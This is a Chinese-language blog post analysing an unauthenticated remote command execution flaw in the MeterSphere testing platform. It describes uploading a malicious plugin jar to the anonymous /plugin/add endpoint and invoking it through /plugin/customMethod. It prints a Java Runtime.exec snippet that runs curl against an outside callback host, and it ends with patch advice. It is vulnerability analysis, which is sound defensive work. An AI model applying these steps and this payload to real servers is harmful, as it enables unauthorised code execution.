MeterSphere 匿名接口远程命令执行漏洞分析

最新推荐文章于 2023-12-16 17:53:51 发布
最新推荐文章于 2023-12-16 17:53:51 发布
阅读量2.8k 收藏
点赞数
分类专栏: 漏洞分析 文章标签: 信息安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42353842/article/details/122404669
版权

软件背景

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、性能测试、 团队协作等功能,全面兼容 JMeter、Postman、Swagger 等开源、主流标准。

影响版本

MeterSphere >= v1.13.0, <= v1.16.3

漏洞分析

1. 官方已发布修复版本v1.16.4,根据github的commit提交记录对比分析:

不难看出,/plugin接口存在匿名访问,v1.16.4版本针对漏洞修复,仅删除了该接口的匿名访问。

2.查找该接口定义文件PluginController.java

结合metersphere业务逻辑不难看出,该漏洞是先通过/plugin/add接口上传插件jar包,然后通过/plugin/customMethod接口执行上传jar包内的自定义函数代码。

3. 插件demo

通过搜索metersphere github ,可以看到有现成的插件demo:

GitHub - metersphere/metersphere-plugin-DebugSampler

4. 修改自定义代码

插件内已定义了customMethod方法,我们修改一下,添加我们的验证代码:

  

Runtime run = Runtime.getRuntime();
try {
        Process process = run.exec("curl g3b7p0.ceye.io");
}catch (Exception e) {
        e.printStackTrace();
}

5. 重新打包,调用/plugin/add接口上传jar包

mvn clean package

 6.调用customMethod类测试验证

 ceye收到http请求验证。

 漏洞修复建议

官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
官方链接:https://github.com/metersphere/metersphere/releases/tag/v1.16.4
 

一苇sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
POC_MeterSphere-RCE
LiBai'S BLOG
01-13 3604
《飞致云MeterSphere开源测试平台远程代码执行漏洞漏洞详情 MeterSphere一站式开源持续测试平台存在的远程代码执行漏洞。由于自定义插件功能处存在缺陷,未经身份验证的攻击者可利用该漏洞在目标系统上远程执行任意代码。请相关用户尽快采取措施进行防护。 MeterSphere是由杭州飞致云信息科技有限公司开发的一站式开源持续测试平台, 涵盖测试跟踪、接口测试、性能测试、 团队协作等功能。兼容 JMeter、Postman、Swagger 等开源、主流标准,助力开发和测试团队利用云弹性进行高度可
MeterSphere (metersphere-offline-installer-v1.19.1.part2.rar)
04-08
MeterSphere 是一站式开源持续测试平台,覆盖测试管理、接口测试、性能测试等。 metersphere-offline-installer-v1.19.1文件分割成三个压缩包,必须凑齐三个才能解压缩使用: metersphere-offline-installer-v...
MeterSphere 任意文件读取漏洞(CVE-2023-25814)
weixin_44304678的博客
11-08 1524
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。
Goby漏洞更新 | MeterSphere 文件读取漏洞(CVE-2023-25814)
m0_46699477的博客
04-07 659
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。MeterSphere存在未授权任意文件读取漏洞
MeterSphere 未授权RCE-代码审计
include_voidmain的博客
04-18 1340
0x01 代码分析 版本<=1.16.3 查看修复日志 https://github.com/metersphere/metersphere/pull/9135/commits/9927d2c587a2b388ee5d633f6cc31346df4415de 将/plugin/** 这个路由的未授权删除了,全局搜索/plugin定位到功能代码 跟进add方法中的pluginService.editPlugin(file) 跟进 在loadJar方法中使用URLClassLoader来加载j
MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)
最新发布
0xSec
12-16 1204
MeterSphere /api/jmeter/download/files 路径文件存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
『Java安全』XStream 1.4.15反序列化漏洞CVE-2021-21345复现与浅析
Ho1aAs‘s Blog
08-17 1266
一种绕过黑名单、触发造成RCE的姿势XStream ≤ 1.4.15 PoC XStream怎么序列化和反序列化PriorityQueue? 分析PoC之前先看看XStream是怎么对待PriorityQueue的:PriorityQueue继承了Serializable,因此使用的是SerializableConveter 因此在doMarshal和doUnMarshal时会调用write/readObject 看PoC使用的是优先级队列,CC链的常客了,写一个demo看看XStream是怎么反序.
MeterSphere (metersphere-offline-installer-v1.19.1.part1.rar)
04-08
MeterSphere 是一站式开源持续测试平台,覆盖测试管理、接口测试、性能测试等。 metersphere-offline-installer-v1.19.1文件分割成三个压缩包,必须凑齐三个才能解压缩使用: metersphere-offline-installer-v...
metersphere-offline-installer-v1.19.1-arm64.part1.rar
04-08
MeterSphere 是一站式开源持续测试平台,覆盖测试管理、接口测试、性能测试等。 metersphere-offline-installer-v1.19.1-arm64文件分割成三个压缩包,必须凑齐三个才能解压缩使用: metersphere-offline-installer...
metersphere-offline-installer-v1.19.1-arm64.part2.rar
04-08
MeterSphere 是一站式开源持续测试平台,覆盖测试管理、接口测试、性能测试等。 metersphere-offline-installer-v1.19.1-arm64文件分割成三个压缩包,必须凑齐三个才能解压缩使用: metersphere-offline-installer...
MeterSphere (metersphere-offline-installer-v1.19.1.part3.rar)
04-08
MeterSphere 是一站式开源持续测试平台,覆盖测试管理、接口测试、性能测试等。 metersphere-offline-installer-v1.19.1文件分割成三个压缩包,必须凑齐三个才能解压缩使用: metersphere-offline-installer-v...
测试工具平台 MeterSphere 分享
小小的木头人的博客
12-20 1156
其实项目 ID 配置完毕后,就已经可以在 MeterSphere 的缺陷管理中提交 Bug 至禅道了。但是当我们尝试提交一个 Bug 并登录禅道后会发现,很多字段都没有填写,比如 Bug 类型、严重等级、测试阶段、浏览器和操作系统等等。所以我们需要在 MeterSphere 中配置一个提交模板,声明禅道中需要用到的字段,这样提交过去的 Bug 就是完整的。可以看到上图中,Bug类型对应的字段是 Type,所以在 ms 平台中配置 Type 即可。在权限维护中,开启超级 Model 调用接口权限,保存即可。
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8578
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 3779
CVE-2022-22965 Spring远程代码执行漏洞复现
教程丨在MeterSphere中使用预执行脚本功能生成接口认证签名
FIT2CLOUD飞致云的博客
09-17 2153
“吃自己的狗粮”。
Samba远程Shell命令注入执行漏洞(CVE-2007-2447)
p_utao的博客
09-02 2591
产生原因 传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行 实验环境 这里使用的目标机是metasploitable2 linux攻击机:192.168.43.113 linux目标机:192.168.43.23 利用攻击 首先对目标机进行扫描,收集可用的服务信息,使用nmap扫描查看系统开放端口和相关的应用程序 msf5 > nmap -sV 192.168.43.23 [*] exec: nmap -sV 192.16
服务老是被攻击,如何设计一套比较安全接口访问策略?
lisheng19870305的专栏
07-28 616
大家好,我是老王,最近接手了一个项目,兴致勃勃的准备大干一场,结果一顿渗透测试下来我都快傻了。什么防重放攻击,请求体篡改,越权攻击,都整上来了,好嘛,我都不清楚这个项目这半年是怎么度过的。不知道大家公司对接口安全这块是怎么考量的,但是对于面向公网提供服务的产品来说,这个可以说是很致命的了。那么,该如何设计一套比较安全接口访问策略呢?...
API接口安全性设计
Yan 小铁匠
04-12 434
接口安全性主要围绕Token、Timestamp和Sign三个机制展开设计,保证接口的数据不会被篡改和重复调用,下面具体来看: Token授权机制: 用户使用用户名密码登录后服务器给客户端返回一个Token(通常是UUID),并将Token-UserId以键值对的形式存放在缓存服务器中。服务端接收到请求后进行Token验证,如果Token不存在,说明请求无效。Token是客户端访问服务端的凭证。...
保证接口数据安全的10种方案
m0_71777195的博客
07-05 1082
我们日常开发中,如何保证接口数据的安全性呢?个人觉得,接口数据安全的保证过程,主要体现在这几个方面:一个就是数据传输过程中的安全,还有就是数据到达服务端,如何识别数据,最后一点就是数据存储的安全性。今天跟大家聊聊保证接口数据安全的10个方案。正在上传…重新上传取消我们都知道,数据在网络传输过程中,很容易被抓包。如果使用的是http协议,因为它是明文传输的,用户的数据就很容易被别人获取。所以需要对数据加密。常见的实现方式,就是对关键字段加密。比如,你一个登录的接口,你可以对密码加密。一般用什么加密算法呢?简单
metersphere接口测试
07-29
您好!关于Metersphere接口测试,我可以给您提供一些基本信息。Metersphere是一款开源的接口测试和性能测试平台,它提供了丰富的功能和工具来帮助开发人员和测试人员进行接口的自动化测试和性能测试。 Metersphere支持多种协议的接口测试,包括HTTP、WebSocket、Dubbo、MQTT等。您可以通过录制和编写测试脚本来进行接口测试,并且可以进行参数化、断言、数据驱动等高级功能的使用。Metersphere还提供了丰富的测试报告和结果分析功能,方便您查看和分析测试结果。 如果您需要更详细的信息或有具体的问题,请随时告诉我!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值